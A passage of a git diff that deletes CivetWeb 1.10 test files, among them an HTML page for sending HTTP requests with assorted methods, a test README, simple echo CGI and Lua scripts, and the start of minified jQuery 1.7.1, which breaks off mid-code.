-          var blen = "";

-          if (body) {

-            blen = "\nWith " + body.length + " bytes body data";

-          }

-

-          if (xmlhttp.readyState == 4)

-          {

-              alert(lmeth + " " + laddr + blen + "\n\nResponse: " + xmlhttp.status + "\n\n" + xmlhttp.responseText);

-          }

-      }

-

-      xmlhttp.send(body);

-

-    }

-

-  ]]></script>

-

-</head>

-<body onload="load()">

-

-<h1 id='h1'>Fatal error: Javascript not available!</h1>

-

-<h2>Test parameters</h2>

-<form lass="cform">

-

-<h3>Protocol</h3>

-<input id="proto_http" type="radio" name="protocol" value="http" /> http <br />

-<input id="proto_https" type="radio" name="protocol" value="https" /> https

-

-<h3>Server/Host</h3>

-<input id="server" type="text" name="server" value="" />

-

-<h3>Resource</h3>

-<input id="resource" type="text" name="resource" value="" />

-

-<h3>Method</h3>

-<!-- http://www.restpatterns.org/HTTP_Methods -->

-<!-- http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html -->

-<table style="border-spacing:15px 0px;">

-  <tr>

-    <td><a href="http://tools.ietf.org/html/rfc7231#section-4.2.1">Save Methods</a></td>

-    <td>"Unsave" <a href="http://tools.ietf.org/html/rfc7231#section-4.2.2">Idempotent Methods</a></td>

-    <td>Non-Idempotent Methods</td>

-    <td>Special</td>

-  </tr>

-  <tr>

-    <td>

-<input id="method_opt" type="radio" name="method" value="OPTIONS" onclick="noBody()" /> OPTIONS <br />

-<input id="method_get" type="radio" name="method" value="GET" onclick="noBody()" /> GET <br />

-<input id="method_hea" type="radio" name="method" value="HEAD" onclick="noBody()" /> HEAD <br />

-<input id="method_tra" type="radio" name="method" value="TRACE" /> TRACE <br />

-<input id="method_pro" type="radio" name="method" value="PROPFIND" /> PROPFIND <br />

-    </td>

-    <td>

-<input id="method_put" type="radio" name="method" value="PUT" /> PUT <br />

-<input id="method_del" type="radio" name="method" value="DELETE" /> DELETE <br />

-<input id="method_cop" type="radio" name="method" value="COPY" /> COPY <br />

-<input id="method_cop" type="radio" name="method" value="MOVE" /> MOVE <br />

-<input id="method_ppa" type="radio" name="method" value="PROPPATCH" /> PROPPATCH <br />

-<input id="method_unl" type="radio" name="method" value="UNLOCK" /> UNLOCK <br />

-    </td>

-    <td>

-<input id="method_pos" type="radio" name="method" value="POST" /> POST <br />

-<input id="method_pat" type="radio" name="method" value="PATCH" /> PATCH <br />

-<input id="method_mkc" type="radio" name="method" value="MKCOL" /> MKCOL <br />

-<input id="method_loc" type="radio" name="method" value="LOCK" /> LOCK <br />

-    </td>

-    <td>

-<input id="method_con" type="radio" name="method" value="CONNECT" /> CONNECT <br />

-<input id="method_userdef" type="radio" name="method" value="INVALID" /> <input id="method_name" type="text" name="method_name" value="INVALID" oninput="var elem = document.getElementById('method_userdef'); elem.checked = true; elem.value=value" /> <br />

-    </td>

-  </tr>

-</table>

-

-<h3>Body data</h3>

-<input id="body_none" type="radio" name="body" value="*" /> No body data <br />

-<input id="body_10" type="radio" name="body" value="1234567890" /> 10 Bytes ("1234567890") <br />

-<input id="body_rnd" type="radio" name="body" value="**" /> <input id="body_bytes" type="number" name="body_bytes" value="100" min="0" step="0" max="999999999" oninput="document.getElementById('body_rnd').checked = true" /> Bytes random data <br />

-

-<h3>Submit</h3>

-<input id="send" type="button" onclick="sendreq()" value="Send request" />

-

-</form>

-

-</body></html>

diff --git a/thirdparty/civetweb-1.10/test/README.md b/thirdparty/civetweb-1.10/test/README.md
deleted file mode 100644
index 49f2245..0000000
--- a/thirdparty/civetweb-1.10/test/README.md
+++ /dev/null
@@ -1,25 +0,0 @@
-Testing
-=======
-
-C API
------
-
-The unit tests leverage the CTest and Check frameworks to provide a easy
-environment to build up unit tests. They are split into Public and Private
-test suites reflecting the public and internal API functions of civetweb.
-
-When adding new functionality to civetweb tests should be written so that the
-new functionality will be tested across the continuous build servers. There
-are various levels of the unit tests:
-
-  * Tests are included in
-  * Test Cases which are there are multiple in
-  * Test Suites which are ran by the check framework by
-  * `civetweb-unit-tests` which is driven using the `--suite` and
-    `--test-case` arguments by
-  * CTest via `add_test` in `CMakeLists.txt`
-
-Each test suite and test case is ran individually by CTest so that it provides
-good feedback to the continuous integration servers and also CMake. Adding a
-new test case or suite will require the corresponding `add_test` driver to be
-added to `CMakeLists.txt`
diff --git a/thirdparty/civetweb-1.10/test/ajax/echo.cgi b/thirdparty/civetweb-1.10/test/ajax/echo.cgi
deleted file mode 100644
index 577c4bd..0000000
--- a/thirdparty/civetweb-1.10/test/ajax/echo.cgi
+++ /dev/null
@@ -1,8 +0,0 @@
-#!/bin/sh
-
-echo "Content-Type: text/plain; charset=utf-8"
-echo "Connection: close"
-echo "Cache-Control: no-cache"
-echo ""
-
-echo "{}"
diff --git a/thirdparty/civetweb-1.10/test/ajax/echo.cgi.old b/thirdparty/civetweb-1.10/test/ajax/echo.cgi.old
deleted file mode 100644
index 3f4eeeb..0000000
--- a/thirdparty/civetweb-1.10/test/ajax/echo.cgi.old
+++ /dev/null
@@ -1,73 +0,0 @@
-#!/usr/bin/lua5.1

-

--- Every CGI script that returns any valid JSON object will work in the test.

--- In case you do not have not yet used CGI, you may want to use this script which is written in Lua.

--- You may download an interpreter from http://luabinaries.sourceforge.net/download.html, extract it

--- to some folder in your search path (the path of the webserver or /usr/bin on Linux), and add the

--- following lines to your .conf file.

--- cgi_interpreter c:\somewhere\lua5.1.exe

--- enable_keep_alive yes

-

-resp = "{";

-

-method = os.getenv("REQUEST_METHOD")

-uri = os.getenv("REQUEST_URI");

-query = os.getenv("QUERY_STRING");

-datalen = os.getenv("CONTENT_LENGTH");

-

-if method then

-  resp = resp .. '"method" : "' .. method .. '", ';

-end

-if uri then

-  resp = resp .. '"uri" : "' .. uri .. '", ';

-end

-if query then

-  resp = resp .. '"query" : "' .. query .. '", ';

-end

-if datalen then

-  resp = resp .. '"datalen" : "' .. datalen .. '", ';

-end

-

-resp = resp .. '"time" : "' .. os.date() .. '" ';

-

-resp = resp .. "}";

-

-

-

-

-print "Status: 200 OK"

-print "Connection: close"

---print "Connection: keep-alive"

-print "Content-Type: text/html; charset=utf-8"

-print "Cache-Control: no-cache"

---print ("Content-Length: " .. resp:len())

-print ""

-

-print (resp)

-

-

-doLogging = false

-

-if (doLogging) then

-  -- Store the POST data to a file

-  if (method == "POST") then

-    myFile = io.open("data" .. query:sub(4) .. ".txt", "wb");

-    myFile:write(resp)

-    myFile:write("\r\n\r\n")  

-    if datalen then

-      datalen = tonumber(datalen)

-      myFile:write("<<< " .. datalen .. " bytes of data >>>\r\n")

-      

-      data = io.stdin:read(datalen)

-      myFile:write(data)

-      

-      myFile:write("\r\n<<< end >>>\r\n")

-    else

-      myFile:write("<<< no data >>>\r\n")

-    end  

-    myFile:close()

-  end

-end

-

-

-

diff --git a/thirdparty/civetweb-1.10/test/ajax/echo.lp b/thirdparty/civetweb-1.10/test/ajax/echo.lp
deleted file mode 100644
index 7276f81..0000000
--- a/thirdparty/civetweb-1.10/test/ajax/echo.lp
+++ /dev/null
@@ -1,9 +0,0 @@
-<?

--- This *.lp file simply runs the *.lua file in the same directory.

-n = string.match(mg.request_info.uri, "^(.*)%.lp$")

-if mg.system:find("Windows") then

-    n = string.gsub(n, [[/]], [[\]])

-end

-n = mg.document_root .. n .. ".lua"

-dofile(n)

-?>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/test/ajax/echo.lua b/thirdparty/civetweb-1.10/test/ajax/echo.lua
deleted file mode 100644
index 1317516..0000000
--- a/thirdparty/civetweb-1.10/test/ajax/echo.lua
+++ /dev/null
@@ -1,35 +0,0 @@
-resp = "{";

-

-method = mg.request_info.request_method

-uri = mg.request_info.uri

-query = mg.request_info.query_string

-datalen = nil -- TODO: "CONTENT_LENGTH" !

-

-if method then

-  resp = resp .. '"method" : "' .. method .. '", ';

-end

-if uri then

-  resp = resp .. '"uri" : "' .. uri .. '", ';

-end

-if query then

-  resp = resp .. '"query" : "' .. query .. '", ';

-end

-if datalen then

-  resp = resp .. '"datalen" : "' .. datalen .. '", ';

-end

-

-resp = resp .. '"time" : "' .. os.date() .. '" ';

-

-resp = resp .. "}";

-

-

-

-mg.write("HTTP/1.1 200 OK\r\n")

-mg.write("Connection: close\r\n")

-mg.write("Content-Type: text/html\r\n")

-mg.write("Cache-Control: no-cache\r\n")

---mg.write("Content-Length: " .. resp:len() .. "\n")

-mg.write("\r\n")

-

-mg.write(resp)

-

diff --git a/thirdparty/civetweb-1.10/test/ajax/jquery.js b/thirdparty/civetweb-1.10/test/ajax/jquery.js
deleted file mode 100644
index 198b3ff..0000000
--- a/thirdparty/civetweb-1.10/test/ajax/jquery.js
+++ /dev/null
@@ -1,4 +0,0 @@
-/*! jQuery v1.7.1 jquery.com | jquery.org/license */
-(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,"display"),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ci(){try{return new a.XMLHttpRequest}catch(b){}}function cc(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g++){if(g===1)for(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l+" "+k,n=e[m]||e["* "+k];if(!n){p=b;for(o in e){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=e[j[1]+" "+k];if(p){o=e[o],o===!0?n=p:p===!0&&(n=o);break}}}}!n&&!p&&f.error("No conversion from "+m.replace(" "," to ")),n!==!0&&(c=n?n(c):p(o(c)))}}return c}function cb(a,c,d){var e=a.contents,f=a.dataTypes,g=a.responseFields,h,i,j,k;for(i in g)i in d&&(c[g[i]]=d[i]);while(f[0]==="*")f.shift(),h===b&&(h=a.mimeType||c.getResponseHeader("content-type"));if(h)for(i in e)if(e[i]&&e[i].test(h)){f.unshift(i);break}if(f[0]in d)j=f[0];else{for(i in d){if(!f[0]||a.converters[i+" "+f[0]]){j=i;break}k||(k=i)}j=j||k}if(j){j!==f[0]&&f.unshift(j);return d[j]}}function ca(a,b,c,d){if(f.isArray(b))f.each(b,function(b,e){c||bE.test(a)?d(a,e):ca(a+"["+(typeof e=="object"||f.isArray(e)?b:"")+"]",e,c,d)});else if(!c&&b!=null&&typeof b=="object")for(var e in 
b)ca(a+"["+e+"]",b[e],c,d);else d(a,b)}function b_(a,c){var d,e,g=f.ajaxSettings.flatOptions||{};for(d in c)c[d]!==b&&((g[d]?a:e||(e={}))[d]=c[d]);e&&f.extend(!0,a,e)}function b$(a,c,d,e,f,g){f=f||c.dataTypes[0],g=g||{},g[f]=!0;var h=a[f],i=0,j=h?h.length:0,k=a===bT,l;for(;i<j&&(k||!l);i++)l=h[i](c,d,e),typeof l=="string"&&(!k||g[l]?l=b:(c.dataTypes.unshift(l),l=b$(a,c,d,e,l,g)));(k||!l)&&!g["*"]&&(l=b$(a,c,d,e,"*",g));return l}function bZ(a){return function(b,c){typeof b!="string"&&(c=b,b="*");if(f.isFunction(c)){var d=b.toLowerCase().split(bP),e=0,g=d.length,h,i,j;for(;e<g;e++)h=d[e],j=/^\+/.test(h),j&&(h=h.substr(1)||"*"),i=a[h]=a[h]||[],i[j?"unshift":"push"](c)}}}function bC(a,b,c){var d=b==="width"?a.offsetWidth:a.offsetHeight,e=b==="width"?bx:by,g=0,h=e.length;if(d>0){if(c!=="border")for(;g<h;g++)c||(d-=parseFloat(f.css(a,"padding"+e[g]))||0),c==="margin"?d+=parseFloat(f.css(a,c+e[g]))||0:d-=parseFloat(f.css(a,"border"+e[g]+"Width"))||0;return d+"px"}d=bz(a,b,b);if(d<0||d==null)d=a.style[b]||0;d=parseFloat(d)||0;if(c)for(;g<h;g++)d+=parseFloat(f.css(a,"padding"+e[g]))||0,c!=="padding"&&(d+=parseFloat(f.css(a,"border"+e[g]+"Width"))||0),c==="margin"&&(d+=parseFloat(f.css(a,c+e[g]))||0);return d+"px"}function bp(a,b){b.src?f.ajax({url:b.src,async:!1,dataType:"script"}):f.globalEval((b.text||b.textContent||b.innerHTML||"").replace(bf,"/*$0*/")),b.parentNode&&b.parentNode.removeChild(b)}function bo(a){var b=c.createElement("div");bh.appendChild(b),b.innerHTML=a.outerHTML;return b.firstChild}function bn(a){var b=(a.nodeName||"").toLowerCase();b==="input"?bm(a):b!=="script"&&typeof a.getElementsByTagName!="undefined"&&f.grep(a.getElementsByTagName("input"),bm)}function bm(a){if(a.type==="checkbox"||a.type==="radio")a.defaultChecked=a.checked}function bl(a){return typeof a.getElementsByTagName!="undefined"?a.getElementsByTagName("*"):typeof a.querySelectorAll!="undefined"?a.querySelectorAll("*"):[]}function bk(a,b){var 
c;if(b.nodeType===1){b.clearAttributes&&b.clearAttributes(),b.mergeAttributes&&b.mergeAttributes(a),c=b.nodeName.toLowerCase();if(c==="object")b.outerHTML=a.outerHTML;else if(c!=="input"||a.type!=="checkbox"&&a.type!=="radio"){if(c==="option")b.selected=a.defaultSelected;else if(c==="input"||c==="textarea")b.defaultValue=a.defaultValue}else a.checked&&(b.defaultChecked=b.checked=a.checked),b.value!==a.value&&(b.value=a.value);b.removeAttribute(f.expando)}}function bj(a,b){if(b.nodeType===1&&!!f.hasData(a)){var c,d,e,g=f._data(a),h=f._data(b,g),i=g.events;if(i){delete h.handle,h.events={};for(c in i)for(d=0,e=i[c].length;d<e;d++)f.event.add(b,c+(i[c][d].namespace?".":"")+i[c][d].namespace,i[c][d],i[c][d].data)}h.data&&(h.data=f.extend({},h.data))}}function bi(a,b){return f.nodeName(a,"table")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function U(a){var b=V.split("|"),c=a.createDocumentFragment();if(c.createElement)while(b.length)c.createElement(b.pop());return c}function T(a,b,c){b=b||0;if(f.isFunction(b))return f.grep(a,function(a,d){var e=!!b.call(a,d,a);return e===c});if(b.nodeType)return f.grep(a,function(a,d){return a===b===c});if(typeof b=="string"){var d=f.grep(a,function(a){return a.nodeType===1});if(O.test(b))return f.filter(b,d,!c);b=f.filter(b,d)}return f.grep(a,function(a,d){return f.inArray(a,b)>=0===c})}function S(a){return!a||!a.parentNode||a.parentNode.nodeType===11}function K(){return!0}function J(){return!1}function n(a,b,c){var d=b+"defer",e=b+"queue",g=b+"mark",h=f._data(a,d);h&&(c==="queue"||!f._data(a,e))&&(c==="mark"||!f._data(a,g))&&setTimeout(function(){!f._data(a,e)&&!f._data(a,g)&&(f.removeData(a,d,!0),h.fire())},0)}function m(a){for(var b in a){if(b==="data"&&f.isEmptyObject(a[b]))continue;if(b!=="toJSON")return!1}return!0}function l(a,c,d){if(d===b&&a.nodeType===1){var e="data-"+c.replace(k,"-$1").toLowerCase();d=a.getAttribute(e);if(typeof 
d=="string"){try{d=d==="true"?!0:d==="false"?!1:d==="null"?null:f.isNumeric(d)?parseFloat(d):j.test(d)?f.parseJSON(d):d}catch(g){}f.data(a,c,d)}else d=b}return d}function h(a){var b=g[a]={},c,d;a=a.split(/\s+/);for(c=0,d=a.length;c<d;c++)b[a[c]]=!0;return b}var c=a.document,d=a.navigator,e=a.location,f=function(){function J(){if(!e.isReady){try{c.documentElement.doScroll("left")}catch(a){setTimeout(J,1);return}e.ready()}}var e=function(a,b){return new e.fn.init(a,b,h)},f=a.jQuery,g=a.$,h,i=/^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,j=/\S/,k=/^\s+/,l=/\s+$/,m=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,n=/^[\],:{}\s]*$/,o=/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,p=/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,q=/(?:^|:|,)(?:\s*\[)+/g,r=/(webkit)[ \/]([\w.]+)/,s=/(opera)(?:.*version)?[ \/]([\w.]+)/,t=/(msie) ([\w.]+)/,u=/(mozilla)(?:.*? rv:([\w.]+))?/,v=/-([a-z]|[0-9])/ig,w=/^-ms-/,x=function(a,b){return(b+"").toUpperCase()},y=d.userAgent,z,A,B,C=Object.prototype.toString,D=Object.prototype.hasOwnProperty,E=Array.prototype.push,F=Array.prototype.slice,G=String.prototype.trim,H=Array.prototype.indexOf,I={};e.fn=e.prototype={constructor:e,init:function(a,d,f){var g,h,j,k;if(!a)return this;if(a.nodeType){this.context=this[0]=a,this.length=1;return this}if(a==="body"&&!d&&c.body){this.context=c,this[0]=c.body,this.selector=a,this.length=1;return this}if(typeof a=="string"){a.charAt(0)!=="<"||a.charAt(a.length-1)!==">"||a.length<3?g=i.exec(a):g=[null,a,null];if(g&&(g[1]||!d)){if(g[1]){d=d instanceof e?d[0]:d,k=d?d.ownerDocument||d:c,j=m.exec(a),j?e.isPlainObject(d)?(a=[c.createElement(j[1])],e.fn.attr.call(a,d,!0)):a=[k.createElement(j[1])]:(j=e.buildFragment([g[1]],[k]),a=(j.cacheable?e.clone(j.fragment):j.fragment).childNodes);return e.merge(this,a)}h=c.getElementById(g[2]);if(h&&h.parentNode){if(h.id!==g[2])return f.find(a);this.length=1,this[0]=h}this.context=c,this.selector=a;return 
this}return!d||d.jquery?(d||f).find(a):this.constructor(d).find(a)}if(e.isFunction(a))return f.ready(a);a.selector!==b&&(this.selector=a.selector,this.context=a.context);return e.makeArray(a,this)},selector:"",jquery:"1.7.1",length:0,size:function(){return this.length},toArray:function(){return F.call(this,0)},get:function(a){return a==null?this.toArray():a<0?this[this.length+a]:this[a]},pushStack:function(a,b,c){var d=this.constructor();e.isArray(a)?E.apply(d,a):e.merge(d,a),d.prevObject=this,d.context=this.context,b==="find"?d.selector=this.selector+(this.selector?" ":"")+c:b&&(d.selector=this.selector+"."+b+"("+c+")");return d},each:function(a,b){return e.each(this,a,b)},ready:function(a){e.bindReady(),A.add(a);return this},eq:function(a){a=+a;return a===-1?this.slice(a):this.slice(a,a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(F.apply(this,arguments),"slice",F.call(arguments).join(","))},map:function(a){return this.pushStack(e.map(this,function(b,c){return a.call(b,c,b)}))},end:function(){return this.prevObject||this.constructor(null)},push:E,sort:[].sort,splice:[].splice},e.fn.init.prototype=e.fn,e.extend=e.fn.extend=function(){var a,c,d,f,g,h,i=arguments[0]||{},j=1,k=arguments.length,l=!1;typeof i=="boolean"&&(l=i,i=arguments[1]||{},j=2),typeof i!="object"&&!e.isFunction(i)&&(i={}),k===j&&(i=this,--j);for(;j<k;j++)if((a=arguments[j])!=null)for(c in a){d=i[c],f=a[c];if(i===f)continue;l&&f&&(e.isPlainObject(f)||(g=e.isArray(f)))?(g?(g=!1,h=d&&e.isArray(d)?d:[]):h=d&&e.isPlainObject(d)?d:{},i[c]=e.extend(l,h,f)):f!==b&&(i[c]=f)}return i},e.extend({noConflict:function(b){a.$===e&&(a.$=g),b&&a.jQuery===e&&(a.jQuery=f);return e},isReady:!1,readyWait:1,holdReady:function(a){a?e.readyWait++:e.ready(!0)},ready:function(a){if(a===!0&&!--e.readyWait||a!==!0&&!e.isReady){if(!c.body)return 
setTimeout(e.ready,1);e.isReady=!0;if(a!==!0&&--e.readyWait>0)return;A.fireWith(c,[e]),e.fn.trigger&&e(c).trigger("ready").off("ready")}},bindReady:function(){if(!A){A=e.Callbacks("once memory");if(c.readyState==="complete")return setTimeout(e.ready,1);if(c.addEventListener)c.addEventListener("DOMContentLoaded",B,!1),a.addEventListener("load",e.ready,!1);else if(c.attachEvent){c.attachEvent("onreadystatechange",B),a.attachEvent("onload",e.ready);var b=!1;try{b=a.frameElement==null}catch(d){}c.documentElement.doScroll&&b&&J()}}},isFunction:function(a){return e.type(a)==="function"},isArray:Array.isArray||function(a){return e.type(a)==="array"},isWindow:function(a){return a&&typeof a=="object"&&"setInterval"in a},isNumeric:function(a){return!isNaN(parseFloat(a))&&isFinite(a)},type:function(a){return a==null?String(a):I[C.call(a)]||"object"},isPlainObject:function(a){if(!a||e.type(a)!=="object"||a.nodeType||e.isWindow(a))return!1;try{if(a.constructor&&!D.call(a,"constructor")&&!D.call(a.constructor.prototype,"isPrototypeOf"))return!1}catch(c){return!1}var d;for(d in a);return d===b||D.call(a,d)},isEmptyObject:function(a){for(var b in a)return!1;return!0},error:function(a){throw new Error(a)},parseJSON:function(b){if(typeof b!="string"||!b)return null;b=e.trim(b);if(a.JSON&&a.JSON.parse)return a.JSON.parse(b);if(n.test(b.replace(o,"@").replace(p,"]").replace(q,"")))return(new Function("return "+b))();e.error("Invalid JSON: "+b)},parseXML:function(c){var d,f;try{a.DOMParser?(f=new DOMParser,d=f.parseFromString(c,"text/xml")):(d=new ActiveXObject("Microsoft.XMLDOM"),d.async="false",d.loadXML(c))}catch(g){d=b}(!d||!d.documentElement||d.getElementsByTagName("parsererror").length)&&e.error("Invalid XML: "+c);return d},noop:function(){},globalEval:function(b){b&&j.test(b)&&(a.execScript||function(b){a.eval.call(a,b)})(b)},camelCase:function(a){return a.replace(w,"ms-").replace(v,x)},nodeName:function(a,b){return 
a.nodeName&&a.nodeName.toUpperCase()===b.toUpperCase()},each:function(a,c,d){var f,g=0,h=a.length,i=h===b||e.isFunction(a);if(d){if(i){for(f in a)if(c.apply(a[f],d)===!1)break}else for(;g<h;)if(c.apply(a[g++],d)===!1)break}else if(i){for(f in a)if(c.call(a[f],f,a[f])===!1)break}else for(;g<h;)if(c.call(a[g],g,a[g++])===!1)break;return a},trim:G?function(a){return a==null?"":G.call(a)}:function(a){return a==null?"":(a+"").replace(k,"").replace(l,"")},makeArray:function(a,b){var c=b||[];if(a!=null){var d=e.type(a);a.length==null||d==="string"||d==="function"||d==="regexp"||e.isWindow(a)?E.call(c,a):e.merge(c,a)}return c},inArray:function(a,b,c){var d;if(b){if(H)return H.call(b,a,c);d=b.length,c=c?c<0?Math.max(0,d+c):c:0;for(;c<d;c++)if(c in b&&b[c]===a)return c}return-1},merge:function(a,c){var d=a.length,e=0;if(typeof c.length=="number")for(var f=c.length;e<f;e++)a[d++]=c[e];else while(c[e]!==b)a[d++]=c[e++];a.length=d;return a},grep:function(a,b,c){var d=[],e;c=!!c;for(var f=0,g=a.length;f<g;f++)e=!!b(a[f],f),c!==e&&d.push(a[f]);return d},map:function(a,c,d){var f,g,h=[],i=0,j=a.length,k=a instanceof e||j!==b&&typeof j=="number"&&(j>0&&a[0]&&a[j-1]||j===0||e.isArray(a));if(k)for(;i<j;i++)f=c(a[i],i,d),f!=null&&(h[h.length]=f);else for(g in a)f=c(a[g],g,d),f!=null&&(h[h.length]=f);return h.concat.apply([],h)},guid:1,proxy:function(a,c){if(typeof c=="string"){var d=a[c];c=a,a=d}if(!e.isFunction(a))return b;var f=F.call(arguments,2),g=function(){return a.apply(c,f.concat(F.call(arguments)))};g.guid=a.guid=a.guid||g.guid||e.guid++;return g},access:function(a,c,d,f,g,h){var i=a.length;if(typeof c=="object"){for(var j in c)e.access(a,j,c[j],f,g,d);return a}if(d!==b){f=!h&&f&&e.isFunction(d);for(var k=0;k<i;k++)g(a[k],c,f?d.call(a[k],k,g(a[k],c)):d,h);return a}return i?g(a[0],c):b},now:function(){return(new Date).getTime()},uaMatch:function(a){a=a.toLowerCase();var 
b=r.exec(a)||s.exec(a)||t.exec(a)||a.indexOf("compatible")<0&&u.exec(a)||[];return{browser:b[1]||"",version:b[2]||"0"}},sub:function(){function a(b,c){return new a.fn.init(b,c)}e.extend(!0,a,this),a.superclass=this,a.fn=a.prototype=this(),a.fn.constructor=a,a.sub=this.sub,a.fn.init=function(d,f){f&&f instanceof e&&!(f instanceof a)&&(f=a(f));return e.fn.init.call(this,d,f,b)},a.fn.init.prototype=a.fn;var b=a(c);return a},browser:{}}),e.each("Boolean Number String Function Array Date RegExp Object".split(" "),function(a,b){I["[object "+b+"]"]=b.toLowerCase()}),z=e.uaMatch(y),z.browser&&(e.browser[z.browser]=!0,e.browser.version=z.version),e.browser.webkit&&(e.browser.safari=!0),j.test(" ")&&(k=/^[\s\xA0]+/,l=/[\s\xA0]+$/),h=e(c),c.addEventListener?B=function(){c.removeEventListener("DOMContentLoaded",B,!1),e.ready()}:c.attachEvent&&(B=function(){c.readyState==="complete"&&(c.detachEvent("onreadystatechange",B),e.ready())});return e}(),g={};f.Callbacks=function(a){a=a?g[a]||h(a):{};var c=[],d=[],e,i,j,k,l,m=function(b){var d,e,g,h,i;for(d=0,e=b.length;d<e;d++)g=b[d],h=f.type(g),h==="array"?m(g):h==="function"&&(!a.unique||!o.has(g))&&c.push(g)},n=function(b,f){f=f||[],e=!a.memory||[b,f],i=!0,l=j||0,j=0,k=c.length;for(;c&&l<k;l++)if(c[l].apply(b,f)===!1&&a.stopOnFalse){e=!0;break}i=!1,c&&(a.once?e===!0?o.disable():c=[]:d&&d.length&&(e=d.shift(),o.fireWith(e[0],e[1])))},o={add:function(){if(c){var a=c.length;m(arguments),i?k=c.length:e&&e!==!0&&(j=a,n(e[0],e[1]))}return this},remove:function(){if(c){var b=arguments,d=0,e=b.length;for(;d<e;d++)for(var f=0;f<c.length;f++)if(b[d]===c[f]){i&&f<=k&&(k--,f<=l&&l--),c.splice(f--,1);if(a.unique)break}}return this},has:function(a){if(c){var b=0,d=c.length;for(;b<d;b++)if(a===c[b])return!0}return!1},empty:function(){c=[];return this},disable:function(){c=d=e=b;return this},disabled:function(){return!c},lock:function(){d=b,(!e||e===!0)&&o.disable();return 
this},locked:function(){return!d},fireWith:function(b,c){d&&(i?a.once||d.push([b,c]):(!a.once||!e)&&n(b,c));return this},fire:function(){o.fireWith(this,arguments);return this},fired:function(){return!!e}};return o};var i=[].slice;f.extend({Deferred:function(a){var b=f.Callbacks("once memory"),c=f.Callbacks("once memory"),d=f.Callbacks("memory"),e="pending",g={resolve:b,reject:c,notify:d},h={done:b.add,fail:c.add,progress:d.add,state:function(){return e},isResolved:b.fired,isRejected:c.fired,then:function(a,b,c){i.done(a).fail(b).progress(c);return this},always:function(){i.done.apply(i,arguments).fail.apply(i,arguments);return this},pipe:function(a,b,c){return f.Deferred(function(d){f.each({done:[a,"resolve"],fail:[b,"reject"],progress:[c,"notify"]},function(a,b){var c=b[0],e=b[1],g;f.isFunction(c)?i[a](function(){g=c.apply(this,arguments),g&&f.isFunction(g.promise)?g.promise().then(d.resolve,d.reject,d.notify):d[e+"With"](this===i?d:this,[g])}):i[a](d[e])})}).promise()},promise:function(a){if(a==null)a=h;else for(var b in h)a[b]=h[b];return a}},i=h.promise({}),j;for(j in g)i[j]=g[j].fire,i[j+"With"]=g[j].fireWith;i.done(function(){e="resolved"},c.disable,d.lock).fail(function(){e="rejected"},b.disable,d.lock),a&&a.call(i,i);return i},when:function(a){function m(a){return function(b){e[a]=arguments.length>1?i.call(arguments,0):b,j.notifyWith(k,e)}}function l(a){return function(c){b[a]=arguments.length>1?i.call(arguments,0):c,--g||j.resolveWith(j,b)}}var b=i.call(arguments,0),c=0,d=b.length,e=Array(d),g=d,h=d,j=d<=1&&a&&f.isFunction(a.promise)?a:f.Deferred(),k=j.promise();if(d>1){for(;c<d;c++)b[c]&&b[c].promise&&f.isFunction(b[c].promise)?b[c].promise().then(l(c),j.reject,m(c)):--g;g||j.resolveWith(j,b)}else j!==a&&j.resolveWith(j,d?[a]:[]);return k}}),f.support=function(){var b,d,e,g,h,i,j,k,l,m,n,o,p,q=c.createElement("div"),r=c.documentElement;q.setAttribute("className","t"),q.innerHTML="   <link/><table></table><a href='/a' 
style='top:1px;float:left;opacity:.55;'>a</a><input type='checkbox'/>",d=q.getElementsByTagName("*"),e=q.getElementsByTagName("a")[0];if(!d||!d.length||!e)return{};g=c.createElement("select"),h=g.appendChild(c.createElement("option")),i=q.getElementsByTagName("input")[0],b={leadingWhitespace:q.firstChild.nodeType===3,tbody:!q.getElementsByTagName("tbody").length,htmlSerialize:!!q.getElementsByTagName("link").length,style:/top/.test(e.getAttribute("style")),hrefNormalized:e.getAttribute("href")==="/a",opacity:/^0.55/.test(e.style.opacity),cssFloat:!!e.style.cssFloat,checkOn:i.value==="on",optSelected:h.selected,getSetAttribute:q.className!=="t",enctype:!!c.createElement("form").enctype,html5Clone:c.createElement("nav").cloneNode(!0).outerHTML!=="<:nav></:nav>",submitBubbles:!0,changeBubbles:!0,focusinBubbles:!1,deleteExpando:!0,noCloneEvent:!0,inlineBlockNeedsLayout:!1,shrinkWrapBlocks:!1,reliableMarginRight:!0},i.checked=!0,b.noCloneChecked=i.cloneNode(!0).checked,g.disabled=!0,b.optDisabled=!h.disabled;try{delete 